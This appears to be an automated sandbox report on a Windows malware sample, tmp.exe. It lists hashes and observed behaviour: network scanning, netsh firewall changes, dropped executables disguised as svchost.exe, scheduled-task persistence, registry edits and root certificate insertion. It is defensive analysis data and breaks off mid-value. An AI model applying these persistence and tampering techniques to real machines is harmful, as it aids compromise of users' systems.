Resubmissions
12-04-2024 14:13
240412-rjrz5aba72 812-04-2024 14:12
240412-rh8aqaba68 712-04-2024 14:05
240412-rd9mzsea7x 812-04-2024 14:05
240412-rd82fsea7v 812-04-2024 14:05
240412-rd8exsea7t 809-04-2024 07:05
240409-hws9aacd6z 809-04-2024 07:05
240409-hwljfacd6x 809-04-2024 07:04
240409-hwbz1acd6t 809-04-2024 07:03
240409-hvcvxacd3y 815-01-2024 20:15
240115-y1q8gsfdf2 7Analysis
-
max time kernel
1800s -
max time network
1805s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
09-04-2024 07:05
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
tmp.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
tmp.exe
Resource
win11-20240221-en
General
-
Target
tmp.exe
-
Size
9.4MB
-
MD5
db3edf03a8a2c8e96fe2d2deaaec76ff
-
SHA1
2d9c9f3a5d06f11c5c881a9df90ba33cc2894ac1
-
SHA256
a40cac0b6ee1729cdb6fca3c950e533b913c2729afbd2fde045e86cc62c0ff60
-
SHA512
121b6ba2c7a91a8639b4b88d9965528df245534ec65c4f1d463dbcc3aa2719debb4417a1a7d919527155097cc00521576b25b2d061b149d0c8b82ca999054135
-
SSDEEP
98304:kT2OhoLUWeKqyubAguIYylB9RK0RU4lFp887VO0J/yLaeWwGvJldmxe:VOE/IYypvU4loRpK
Malware Config
Signatures
-
Contacts a large (1181) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Modifies Windows Firewall 2 TTPs 22 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 2496 netsh.exe 2368 netsh.exe 2288 netsh.exe 1536 netsh.exe 2856 netsh.exe 2212 netsh.exe 2680 netsh.exe 2772 netsh.exe 2656 netsh.exe 3032 netsh.exe 2372 netsh.exe 1092 netsh.exe 1764 netsh.exe 2608 netsh.exe 2668 netsh.exe 2548 netsh.exe 2580 netsh.exe 2068 netsh.exe 2176 netsh.exe 2792 netsh.exe 2236 netsh.exe 2828 netsh.exe -
Executes dropped EXE 12 IoCs
Processes:
svchost.exe~tlFA34.tmpsvchost.exe~tlDA1A.tmpsvchost.exe~tl2849.tmpsvchost.exe~tl7D1C.tmpsvchost.exe~tlDEEA.tmpsvchost.exe~tl4396.tmppid process 1976 svchost.exe 868 ~tlFA34.tmp 3064 svchost.exe 2544 ~tlDA1A.tmp 2104 svchost.exe 876 ~tl2849.tmp 292 svchost.exe 980 ~tl7D1C.tmp 1560 svchost.exe 2040 ~tlDEEA.tmp 2188 svchost.exe 2516 ~tl4396.tmp -
Loads dropped DLL 20 IoCs
Processes:
tmp.exesvchost.exe~tlFA34.tmpsvchost.exetaskeng.exesvchost.exetaskeng.exesvchost.exetaskeng.exesvchost.exetaskeng.exesvchost.exepid process 2172 tmp.exe 2172 tmp.exe 1976 svchost.exe 1976 svchost.exe 868 ~tlFA34.tmp 868 ~tlFA34.tmp 3064 svchost.exe 3064 svchost.exe 1944 taskeng.exe 2104 svchost.exe 2104 svchost.exe 880 taskeng.exe 292 svchost.exe 292 svchost.exe 1296 taskeng.exe 1560 svchost.exe 1560 svchost.exe 2028 taskeng.exe 2188 svchost.exe 2188 svchost.exe -
Drops file in System32 directory 39 IoCs
Processes:
~tl4396.tmpsvchost.exepowershell.exesvchost.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exe~tl7D1C.tmppowershell.exepowershell.exesvchost.exe~tl2849.tmppowershell.exepowershell.exe~tlDEEA.tmppowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[1].htm ~tl4396.tmp File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[1].htm svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ~tl4396.tmp File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\output1[1].jpg svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\output1[1].jpg svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[1].htm svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[1].htm ~tl7D1C.tmp File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\output1[1].jpg svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[1].htm ~tl2849.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ~tl2849.tmp File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[2].htm svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[1].htm svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[1].htm ~tlDEEA.tmp File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\output1[1].jpg svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[2].htm svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ~tl7D1C.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ~tlDEEA.tmp File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[1].htm svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\getlog[2].htm ~tl2849.tmp File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 11 IoCs
Processes:
svchost.exesvchost.exesvchost.exetmp.exe~tlFA34.tmpsvchost.exesvchost.exesvchost.exedescription ioc process File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\System\xxx1.bak tmp.exe File opened for modification C:\Windows\System\svchost.exe tmp.exe File opened for modification C:\Windows\System\svchost.exe ~tlFA34.tmp File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\System\svchost.exe tmp.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\System\xxx1.bak ~tlFA34.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1080 schtasks.exe 2988 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
~tl2849.tmp~tlDEEA.tmpnetsh.exenetsh.exenetsh.exenetsh.exesvchost.exesvchost.exesvchost.exenetsh.exepowershell.exesvchost.exe~tl4396.tmpnetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe~tl7D1C.tmpdescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" ~tl2849.tmp Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" ~tlDEEA.tmp Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72 svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72\WpadDecision = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF}\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF}\WpadDecision = "0" ~tl2849.tmp Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72\WpadDecision = "0" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000007000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0081000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ~tlDEEA.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings ~tl4396.tmp Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 460000000a000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0081000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ~tl4396.tmp Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0081000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ~tl2849.tmp Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72\WpadDecision = "0" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72\WpadDecisionTime = 60058fe1598ada01 ~tl2849.tmp Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF} svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72 ~tl4396.tmp Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF}\WpadDecision = "0" ~tl4396.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF}\WpadDecision = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF} ~tl2849.tmp Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ~tl7D1C.tmp Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF} ~tl7D1C.tmp Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF}\ea-28-a8-cd-b8-72 svchost.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ~tlDEEA.tmp Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A1898A27-0D79-4999-BE45-34B77F5023CF}\WpadDecisionTime = e0c780cb598ada01 svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ~tl7D1C.tmp Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000005000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0081000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ~tl7D1C.tmp Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72 ~tl7D1C.tmp Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72\WpadDetectedUrl svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ~tl2849.tmp Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ~tlDEEA.tmp Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72\WpadDecisionReason = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" ~tlDEEA.tmp Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-28-a8-cd-b8-72 ~tlDEEA.tmp -
Processes:
~tlDA1A.tmpdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A ~tlDA1A.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 ~tlDA1A.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 ~tlDA1A.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 ~tlDA1A.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 